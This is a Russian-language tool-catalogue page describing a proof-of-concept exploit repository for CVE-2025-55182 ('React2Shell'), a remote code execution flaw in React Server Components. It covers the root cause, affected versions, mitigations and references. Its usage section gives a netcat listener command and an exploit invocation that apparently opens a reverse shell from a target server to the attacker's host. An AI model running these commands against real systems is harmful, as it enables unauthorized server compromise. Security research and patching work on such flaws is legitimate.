Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182-React2Shell-RCE — Эксплойт proof-of-concept для CVE-2025-55182 (React2Shell), неаутентифицированная уязвимость удаленного выполнения кода в React Server Components через специально сформированные payloads протокола Flight. | Kitploit
Инструменты/GitHubGitHub/herick-costa/cve-2025-55182-react2shell-rce
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного Доступа

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
herick-costa/cve-2025-55182-react2shell-rce

CVE-2025-55182-React2Shell-RCE

Эксплойт proof-of-concept для CVE-2025-55182 (React2Shell), неаутентифицированная уязвимость удаленного выполнения кода в React Server Components через специально сформированные payloads протокола Flight.

Репозиторий
11 месяц назадЕщё не проверено

CVE CVSS RCE Status

CVE-2025-55182 - React2Shell (Неаутентифицированное RCE в React Server Components)

CVE-2025-55182, также известный как React2Shell, представляет собой критическую уязвимость неаутентифицированного удалённого выполнения кода (RCE), затрагивающую пакеты React Server Components (версии 19.0, 19.1.0, 19.1.1 и 19.2.0).

Эта уязвимость может позволить атакующим выполнить произвольный код на уязвимых серверах с помощью одного специально сформированного HTTP-запроса без необходимости аутентификации.


Обзор

React Server Components используют Flight-протокол для сериализации и десериализации данных компонентов, которыми обмениваются клиент и сервер.

Некорректная проверка в процессе этой десериализации может позволить специально сформированным полезным нагрузкам манипулировать внутренними структурами объектов и достигать опасных примитивов выполнения JavaScript.


Первопричина

Уязвимость возникает из-за недостаточной проверки при десериализации полезных нагрузок Flight-протокола React Server Components (RSC).

Специально сформированные полезные нагрузки могут:

  • манипулировать внутренними структурами объектов
  • обходить цепочку прототипов JavaScript
  • получать доступ к опасным конструкторам JavaScript
  • добиваться выполнения произвольного кода на сервере

Как это работает

  1. Эксплойт отправляет специально сформированный запрос multipart/form-data
  2. Сервер интерпретирует запрос как полезную нагрузку React Flight
  3. Вредоносный фрагмент обрабатывается во время десериализации
  4. Полезная нагрузка:
    • манипулирует внутренним потоком выполнения
    • достигает опасных примитивов выполнения JavaScript
    • выполняет произвольный код
  5. Атакующий получает удалённое выполнение кода на целевом сервере

🚀 Использование

Запустите слушатель на вашей машине:

root@kitploit:~
nc -lvnp 4444

Запустите эксплойт:

root@kitploit:~
python3 CVE-2025-55182-React2Shell.py <TARGET_URL> <LHOST>
python3 CVE-2025-55182-React2Shell.py http://192.168.56.101:3000/ 192.168.56.100

Требования

  • Уязвимые версии React / Next.js
  • Включенные серверные React Server Components
  • Доступная конечная точка RSC

Смягчение

Для смягчения этой уязвимости:

  • Обновите React до последней доступной исправленной версии
  • Примените доступные патчи фреймворка
  • Отслеживайте и блокируйте подозрительные RSC-запросы

Ссылки

  • OffSec – Анализ эксплуатации CVE-2025-55182

- Microsoft Security – Защита от React2Shell

- Совет по безопасности React (официальное раскрытие)


Отказ от ответственности

Данный проект предоставляется строго для:

  • Исследований безопасности
  • Образовательных целей
  • Авторизованных оценок безопасности и тестирования на проникновение

Авторы не несут ответственности за неправомерное использование или ущерб, причинённый данным материалом. Пользователи несут единоличную ответственность за соблюдение всех применимых законов и нормативных актов.

Скачать инструмент